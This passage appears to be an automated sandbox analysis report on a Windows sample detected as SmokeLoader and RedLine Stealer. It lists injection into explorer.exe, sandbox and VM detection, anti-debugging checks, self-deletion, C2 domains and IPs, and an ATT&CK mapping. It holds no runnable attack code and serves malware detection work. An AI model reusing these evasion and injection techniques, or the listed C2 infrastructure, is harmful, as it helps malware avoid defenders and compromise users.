      Source: C:\Users\user\AppData\Roaming\dvjdfvr Code function: 5_2_0040158E NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Code function: 5_2_004015BC NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exe Code function: 0_2_00401A28
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Code function: 5_2_00401A28
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Code function: 7_2_0040FC4F
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Code function: 7_2_0040E038
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Code function: 7_2_0040D5B0
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Code function: 7_2_00404E2D
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Code function: 7_2_00403ECD
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Code function: 7_2_0040DAF4
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Code function: 7_2_0040E730
      Source: kGSZ4dCqYh.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 00000005.00000002.2090478524.0000000000550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000000.00000002.1862957209.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000000.00000002.1862980152.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000000.00000002.1863029600.0000000000651000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000005.00000002.2090513435.0000000000560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000005.00000002.2090678627.0000000001FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
      Source: 00000005.00000002.2090450815.0000000000520000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000000.00000002.1862925311.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: kGSZ4dCqYh.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: dvjdfvr.1.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: classification engine Classification label: mal100.troj.evad.winEXE@3/2@83/2
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exe Code function: 0_2_006019D7 CreateToolhelp32Snapshot,Module32First
      Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\dvjdfvr
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Command line argument: K*w 7_2_00402DF0
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Command line argument: l_H) 7_2_00402DF0
      Source: C:\Windows\explorer.exe File read: C:\Users\desktop.ini
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: kGSZ4dCqYh.exe ReversingLabs: Detection: 39%
      Source: unknown Process created: C:\Users\user\Desktop\kGSZ4dCqYh.exe "C:\Users\user\Desktop\kGSZ4dCqYh.exe"
      Source: unknown Process created: C:\Users\user\AppData\Roaming\dvjdfvr C:\Users\user\AppData\Roaming\dvjdfvr
      Source: unknown Process created: C:\Users\user\AppData\Roaming\dvjdfvr C:\Users\user\AppData\Roaming\dvjdfvr
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exe Section loaded: apphelp.dll
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exe Section loaded: msimg32.dll
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exe Section loaded: msvcr100.dll
      Source: C:\Windows\explorer.exe Section loaded: taskschd.dll
      Source: C:\Windows\explorer.exe Section loaded: webio.dll
      Source: C:\Windows\explorer.exe Section loaded: windows.internal.shell.broker.dll
      Source: C:\Windows\explorer.exe Section loaded: vcruntime140_1.dll
      Source: C:\Windows\explorer.exe Section loaded: vcruntime140.dll
      Source: C:\Windows\explorer.exe Section loaded: msvcp140.dll
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Section loaded: apphelp.dll
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Section loaded: msimg32.dll
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Section loaded: msvcr100.dll
      Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exe File opened: C:\Windows\SysWOW64\msvcr100.dll

      Data Obfuscation

      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exe Unpacked PE file: 0.2.kGSZ4dCqYh.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Unpacked PE file: 5.2.dvjdfvr.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Code function: 7_2_00409B95 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exe Code function: 0_2_0040294B push ebx; ret 0_2_00402957
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exe Code function: 0_2_00402923 push ebx; ret 0_2_00402926
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exe Code function: 0_2_00402930 push ebx; ret 0_2_00402942
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exe Code function: 0_2_00608F5D push edi; iretd 0_2_00608F78
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exe Code function: 0_2_00609231 push edx; iretd 0_2_00609332
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exe Code function: 0_2_00609305 push edx; iretd 0_2_00609332
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exe Code function: 0_2_00603113 push es; ret 0_2_00603114
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exe Code function: 0_2_006229B2 push ebx; ret 0_2_006229BE
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exe Code function: 0_2_0062298A push ebx; ret 0_2_0062298D
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exe Code function: 0_2_00622997 push ebx; ret 0_2_006229A9
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Code function: 5_2_0040294B push ebx; ret 5_2_00402957
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Code function: 5_2_00402923 push ebx; ret 5_2_00402926
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Code function: 5_2_00402930 push ebx; ret 5_2_00402942
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Code function: 5_2_00538F5D push edi; iretd 5_2_00538F78
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Code function: 5_2_00533113 push es; ret 5_2_00533114
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Code function: 5_2_00539305 push edx; iretd 5_2_00539332
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Code function: 5_2_00539231 push edx; iretd 5_2_00539332
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Code function: 5_2_00552997 push ebx; ret 5_2_005529A9
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Code function: 5_2_0055298A push ebx; ret 5_2_0055298D
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Code function: 5_2_005529B2 push ebx; ret 5_2_005529BE
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Code function: 7_2_00405439 push ecx; ret 7_2_0040544C
      Source: kGSZ4dCqYh.exe Static PE information: section name: .text entropy: 7.014294223606666
      Source: dvjdfvr.1.dr Static PE information: section name: .text entropy: 7.014294223606666
      Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\dvjdfvr

      Hooking and other Techniques for Hiding and Protection

      Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\kgsz4dcqyh.exe
      Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\dvjdfvr:Zone.Identifier read attributes | delete
      Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exe API/Special instruction interceptor: Address: 7FFE2220E814
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exe API/Special instruction interceptor: Address: 7FFE2220D584
      Source: C:\Users\user\AppData\Roaming\dvjdfvr API/Special instruction interceptor: Address: 7FFE2220E814
      Source: C:\Users\user\AppData\Roaming\dvjdfvr API/Special instruction interceptor: Address: 7FFE2220D584
      Source: kGSZ4dCqYh.exe, 00000000.00000002.1863053044.000000000068E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ASWHOOK.
      Source: C:\Windows\explorer.exe Window / User API: threadDelayed 461
      Source: C:\Windows\explorer.exe Window / User API: threadDelayed 2986
      Source: C:\Windows\explorer.exe Window / User API: threadDelayed 807
      Source: C:\Windows\explorer.exe Window / User API: threadDelayed 356
      Source: C:\Windows\explorer.exe Window / User API: threadDelayed 370
      Source: C:\Windows\explorer.exe Window / User API: threadDelayed 1738
      Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 885
      Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 860
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_7-6562
      Source: C:\Users\user\AppData\Roaming\dvjdfvr API coverage: 0.4 %
      Source: C:\Windows\explorer.exe TID: 4828 Thread sleep count: 461 > 30
      Source: C:\Windows\explorer.exe TID: 3156 Thread sleep count: 2986 > 30
      Source: C:\Windows\explorer.exe TID: 3156 Thread sleep time: -298600s >= -30000s
      Source: C:\Windows\explorer.exe TID: 4820 Thread sleep count: 807 > 30
      Source: C:\Windows\explorer.exe TID: 4820 Thread sleep time: -80700s >= -30000s
      Source: C:\Windows\explorer.exe TID: 4924 Thread sleep count: 337 > 30
      Source: C:\Windows\explorer.exe TID: 5228 Thread sleep count: 356 > 30
      Source: C:\Windows\explorer.exe TID: 5228 Thread sleep time: -35600s >= -30000s
      Source: C:\Windows\explorer.exe TID: 4040 Thread sleep count: 370 > 30
      Source: C:\Windows\explorer.exe TID: 4040 Thread sleep time: -37000s >= -30000s
      Source: C:\Windows\explorer.exe TID: 3156 Thread sleep count: 1738 > 30
      Source: C:\Windows\explorer.exe TID: 3156 Thread sleep time: -173800s >= -30000s
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Code function: 7_2_00402780 InterlockedIncrement,SetFileAttributesA,GetCommConfig,GetNumberFormatW,GetLogicalDriveStringsW,VerifyVersionInfoW,GetComputerNameW,ClearCommBreak,InterlockedIncrement,EnumTimeFormatsW,GetTempFileNameW,_memset,CommConfigDialogW,ReadConsoleInputA,GetVersionExW,InterlockedIncrement,SetVolumeMountPointW,GlobalMemoryStatus
      Source: explorer.exe, 00000001.00000000.1845787416.00000000098A8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
      Source: explorer.exe, 00000001.00000000.1845367065.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
      Source: explorer.exe, 00000001.00000000.1845367065.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NECVMWar VMware SATA CD00\w
      Source: explorer.exe, 00000001.00000000.1845787416.00000000098A8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
      Source: explorer.exe, 00000001.00000000.1842655910.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
      Source: explorer.exe, 00000001.00000000.1845787416.0000000009977000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
      Source: explorer.exe, 00000001.00000000.1843808640.00000000078AD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTTAVMWare
      Source: explorer.exe, 00000001.00000000.1845367065.0000000009815000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
      Source: explorer.exe, 00000001.00000000.1845367065.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1845367065.000000000982D000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
      Source: explorer.exe, 00000001.00000000.1845787416.0000000009977000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
      Source: explorer.exe, 00000001.00000000.1843808640.0000000007A34000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBnx
      Source: explorer.exe, 00000001.00000000.1845367065.0000000009660000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
      Source: explorer.exe, 00000001.00000000.1842655910.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
      Source: explorer.exe, 00000001.00000000.1842655910.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: C:\Users\user\AppData\Roaming\dvjdfvr API call chain: ExitProcess graph end node graph_7-6564
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exe System information queried: ModuleInformation
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exe Process information queried: ProcessInformation

      Anti Debugging

      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exe System information queried: CodeIntegrityInformation
      Source: C:\Users\user\AppData\Roaming\dvjdfvr System information queried: CodeIntegrityInformation
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exe Process queried: DebugPort
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Process queried: DebugPort
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Code function: 7_2_0040841C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Code function: 7_2_00409B95 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exe Code function: 0_2_006012B4 push dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exe Code function: 0_2_0062092B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exe Code function: 0_2_00620D90 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Code function: 5_2_005312B4 push dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Code function: 5_2_0055092B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Code function: 5_2_00550D90 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Code function: 7_2_0040841C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Code function: 7_2_00406DBA _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Code function: 7_2_0040BE4E __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Code function: 7_2_00407345 SetUnhandledExceptionFilter

      HIPS / PFW / Operating System Protection Evasion

      Source: C:\Windows\explorer.exe File created: dvjdfvr.1.dr
      Source: C:\Windows\explorer.exe Network Connect: 201.124.145.196 80
      Source: C:\Windows\explorer.exe Network Connect: 189.164.127.217 80
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exe Thread created: C:\Windows\explorer.exe EIP: 8EF19D0
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Thread created: unknown EIP: 87C19D0
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
      Source: C:\Users\user\Desktop\kGSZ4dCqYh.exe Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read
      Source: explorer.exe, 00000001.00000000.1845367065.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1843673761.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1842872413.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000001.00000000.1842872413.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
      Source: explorer.exe, 00000001.00000000.1842655910.0000000001240000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 1Progman$
      Source: explorer.exe, 00000001.00000000.1842872413.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
      Source: explorer.exe, 00000001.00000000.1842872413.00000000018A0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Code function: 7_2_0040F4CC GetLocaleInfoA
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Code function: 7_2_004029B0 GetNumberFormatW,GetTimeFormatW,GetModuleFileNameW,GetNumberFormatW,CreateJobObjectW,GetConsoleAliasExesW,CreateNamedPipeA,SetFileShortNameW,CreateProcessW,GetTimeFormatW,GetModuleFileNameW,TlsSetValue,SetEnvironmentVariableA,GetTimeFormatW,GetModuleFileNameW
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Code function: 7_2_00408071 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter
      Source: C:\Users\user\AppData\Roaming\dvjdfvr Code function: 7_2_00402780 InterlockedIncrement,SetFileAttributesA,GetCommConfig,GetNumberFormatW,GetLogicalDriveStringsW,VerifyVersionInfoW,GetComputerNameW,ClearCommBreak,InterlockedIncrement,EnumTimeFormatsW,GetTempFileNameW,_memset,CommConfigDialogW,ReadConsoleInputA,GetVersionExW,InterlockedIncrement,SetVolumeMountPointW,GlobalMemoryStatus

      Stealing of Sensitive Information

      Source: Yara match File source: 00000000.00000002.1862980152.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: 00000000.00000002.1863029600.0000000000651000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: 00000005.00000002.2090513435.0000000000560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: 00000005.00000002.2090678627.0000000001FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      Source: Yara match File source: 00000000.00000002.1862980152.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: 00000000.00000002.1863029600.0000000000651000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: 00000005.00000002.2090513435.0000000000560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: 00000005.00000002.2090678627.0000000001FF1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

      ATT&CK matrix, listed by tactic (a number in front of a technique is the count the report displays next to it; techniques without a number carry no count):

      Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
      Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
      Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
      Execution: 2 Command and Scripting Interpreter; 2 Native API; 1 Exploitation for Client Execution; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
      Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
      Privilege Escalation: 33 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
      Defense Evasion: 11 Masquerading; 12 Virtualization/Sandbox Evasion; 33 Process Injection; 1 Hidden Files and Directories; 2 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading; 1 File Deletion
      Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
      Discovery: 1 System Time Discovery; 521 Security Software Discovery; 12 Virtualization/Sandbox Evasion; 3 Process Discovery; 1 Application Window Discovery; 2 File and Directory Discovery; 114 System Information Discovery; System Owner/User Discovery
      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
      Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
      Command and Control: 1 Encrypted Channel; 2 Non-Application Layer Protocol; 112 Application Layer Protocol; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
      Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
      Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
Behavior Graph ID: 1541371, Sample: kGSZ4dCqYh.exe, Start date: 24/10/2024, Architecture: WINDOWS, Score: 100

Start (node 2):
• DNS/IP: volisc.biz; tnc-corp.ru; 2 other IPs or domains
• Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 6 other signatures
• Started processes: kGSZ4dCqYh.exe (node 7); dvjdfvr (node 10); dvjdfvr (node 12)

kGSZ4dCqYh.exe (node 7):
• Signatures: Detected unpacking (changes PE section rights); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)); 4 other signatures
• Injected into: explorer.exe 61 3 (node 14)

dvjdfvr (node 10):
• Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file

explorer.exe (node 14, injected):
• DNS/IP: tnc-corp.ru 189.164.127.217, 49736, 50003, 50004, UninetSAdeCVMX Mexico; 201.124.145.196, 58683, 58684, 58685, UninetSAdeCVMX Mexico
• Dropped files: C:\Users\user\AppData\Roaming\dvjdfvr, PE32; C:\Users\user\...\dvjdfvr:Zone.Identifier, ASCII
• Signatures: System process connects to network (likely due to code injection or exploit); Benign windows process drops PE files; Deletes itself after installation; Hides that the sample has been downloaded from the Internet (zone.identifier)

Source | Detection | Scanner | Label
kGSZ4dCqYh.exe | 39% | ReversingLabs | Win32.Dropper.Generic
kGSZ4dCqYh.exe | 100% | Avira | HEUR/AGEN.1306978
kGSZ4dCqYh.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\dvjdfvr | 100% | Avira | HEUR/AGEN.1306978
C:\Users\user\AppData\Roaming\dvjdfvr | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\dvjdfvr | 39% | ReversingLabs | Win32.Trojan.Generic

No Antivirus matches

No Antivirus matches
Source | Detection | Scanner | Label
https://aka.ms/odirmr | 0% | URL Reputation | safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | 0% | URL Reputation | safe
https://powerpoint.office.comcember | 0% | URL Reputation | safe
https://api.msn.com:443/v1/news/Feed/Windows? | 0% | URL Reputation | safe
https://excel.office.com | 0% | URL Reputation | safe
